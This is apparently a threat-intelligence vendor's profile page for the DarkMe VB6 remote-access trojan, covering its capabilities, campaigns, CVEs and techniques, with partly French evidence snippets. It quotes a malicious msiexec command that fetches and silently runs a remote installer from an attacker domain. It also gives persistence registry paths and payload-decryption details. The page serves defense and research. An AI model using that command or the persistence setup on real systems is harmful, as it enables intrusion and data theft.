DarkMe is a Windows remote-access trojan and spyware family implemented in Visual Basic 6. Identified versions date to 2021 and show an evolution from downloader functionality to a broader remote-control and information-stealing toolset. It has been associated with financially motivated activity attributed to Water Hydra, also tracked as DarkCasino, and with campaigns attributed to Evilnum. Targets have included financial-market traders, cryptocurrency users, online gambling operators and their customers, and corporate users.
DarkMe supports arbitrary command execution, disk and directory enumeration, file reading and writing, copying, renaming and deletion, screenshot capture, self-updating, and registry-based persistence. Some versions support keylogging. It collects host details, including computer and user names, geographic information, antivirus products, and foreground-window titles, and can steal cryptocurrency-wallet data. Remote commands and collected information are exchanged through custom socket-based command-and-control communications.
Delivery campaigns have used trading forums, stock-trading Telegram channels, phishing emails, deceptive executables, and steganographic images. Earlier attacks exploited CVE-2023-38831 in WinRAR and CVE-2024-21412 to bypass Microsoft Defender SmartScreen and deploy DarkMe. Campaigns observed in 2026 instead used phishing links presented as images to deliver executable PIF files, which retrieved remote Windows Installer packages and launched a multistage VB6 loader chain. Attribution of these later incidents to Water Hydra has not been confirmed.
DarkMe infection chains employ obfuscation, DLL sideloading, COM-based execution, and process injection, including process hollowing into a legitimate Microsoft-signed executable. A documented loader checks for 329 common applications and stops execution if none are found, helping avoid analysis environments. Persistence can combine a custom URI handler with a registry startup entry to obscure execution behind Windows Explorer. Some payloads use a defective RC4-like protection routine whose output becomes predictable after the initial bytes.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2023-38831 is a vulnerability that enables malicious actors to execute arbitrary code when a user tries to access a harmless file contained within a ZIP archive.
“When a user opens the internet shortcut file, it exploits CVE-2024-21412 to evade Microsoft Defender SmartScreen and triggers the execution of the LNK file hosted on the same WebDAV share.” The content also uses CVE-2024-21212 once for this same infection step; this appears to be a typographical error rather than a separate vulnerability.
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
DarkMe – a malware used by Evilnum APT – began exploiting this vulnerability in July 2023.
The APT group known as Water Hydra has been leveraging CVE-2024-21412 in a targeted campaign against financial market traders, bypassing SmartScreen to deploy the DarkMe remote access trojan (RAT).
DarkMe is distributed through phishing emails linking to a disguised .pif executable. The infection chain performs application-based sandbox checks, establishes registry persistence, profiles the system, uses process hollowing, and deploys a Visual Basic 6 RAT and infostealer targeting crypto-wallets and screenshots.
30 distinct techniques documented for this family, organized by ATT&CK tactic.
“The execution started a chain of additional downloads and executions, script running, deployment of components...”
When a victim double-clicks on the PDF, the vulnerability will quietly launch a script in the folder to install malware on the device.
Enregistrement d’un handler de protocole personnalisé Locked:// sous HKCU\Software\Classes\Locked\shell\open\command.
“Only then does it inject the final payload into clspack.exe, a legitimate, digitally signed Microsoft program”
Finalized.dll déchiffre le payload company.cer et effectue le process hollowing dans clspack.exe.
Finalized.dll déchiffre le payload company.cer; la routine RC4 cassée dégénère en XOR single-byte 0x02 après 7 octets.
“The link supposedly points to a PNG file, but clicking on it triggers the download of image.pif, a Windows executable.”
image.pif est déguisé en image; le MSI utilise le nom de couverture « PrinterFind Softwares »; clspack.exe est un binaire Microsoft légitime copié dans %AppData%\Microsoft\.
“Only then does it inject the final payload into clspack.exe, a legitimate, digitally signed Microsoft program”
Finalized.dll déchiffre le payload company.cer et effectue le process hollowing dans clspack.exe.
Finalized.dll déchiffre le payload company.cer.
Le .pif invoque msiexec /i https://onlineview365[.]com/propi.msi /quiet /norestart.
T1012 — Query Registry (Discovery) est identifié dans les TTPs de la campagne.
Use.dll recherche 329 applications et Finalized.dll profile le système.
96 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
RAT VB6 delivered through phishing links and a disguised .pif executable. It uses chained COM/VB6 loaders, anti-sandbox checks, process hollowing into a legitimate signed binary, a custom Locked:// protocol handler and Run key persistence, and TCP C2. Confirmed capabilities include cryptocurrency-wallet theft, screen capture, antivirus enumeration, file manipulation, and command execution.
A Visual Basic 6-based remote-access spyware that uses a VB6 loader chain and a modified RC4 routine producing a single-byte XOR payload. The latest activity used email-based social engineering to induce execution of a .pif file, rather than exploiting vulnerabilities. It establishes persistence using %AppData%\ComponentsFolder\ and the HKCU\Software\Classes\Locked\shell\open\command registry key, launched through explorer.exe "Locked://Newest".
A Visual Basic 6 remote-access trojan and information stealer. It is delivered through phishing, uses a large list of common consumer applications to identify real user systems and evade sandboxes, establishes persistence through the registry, profiles hosts, performs process hollowing, steals cryptocurrency-wallet data, and captures screenshots.
DarkMe is a remote-access trojan historically linked to Water Hydra/DarkCasino. In this campaign, it is delivered through phishing rather than an exploit, conducts extensive anti-analysis checks, injects into a signed Microsoft process, and is characterized as shifting toward conventional information-stealing activity.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.